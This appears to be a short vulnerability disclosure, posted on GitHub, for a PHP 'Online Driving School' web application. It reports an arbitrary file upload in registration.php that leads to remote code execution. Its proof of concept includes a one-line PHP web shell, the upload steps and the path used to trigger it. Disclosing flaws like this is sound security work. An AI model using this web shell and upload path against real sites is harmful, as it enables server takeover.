Skip to content
Permalink
main
Switch branches/tags

Name already in use

A tag already exists with the provided branch name. Many Git commands accept both tag and branch names, so creating this branch may cause unexpected behavior. Are you sure you want to create this branch?
Go to file
 
 
Cannot retrieve contributors at this time

Online Driving School Project In PHP Arbitrary File Upload And RCE

The Online Driving School Project is a simple mini project for driving institutes. The project contains admin, learners, and users. The user can either be police or victims/complainers. This project is for the institute of driver training first commenced its operations in managing the learners and people who want to take a good learners school as well as the admin which means the owner of the web application can select the best and near learners to the people and connect them both.

project link: https://code-projects.org/online-driving-school-project-in-php-with-source-code/

in /registration.php, an attacker can upload an arbitrary file

which leads to remote code execution

POC

First, register an user and choose a backdoor php file as user image

shell0.php

<?php
eval($_POST[1]);

then go to /admin/images/shell0.php and post shellcode

the codephpinfo();has been successfully executed.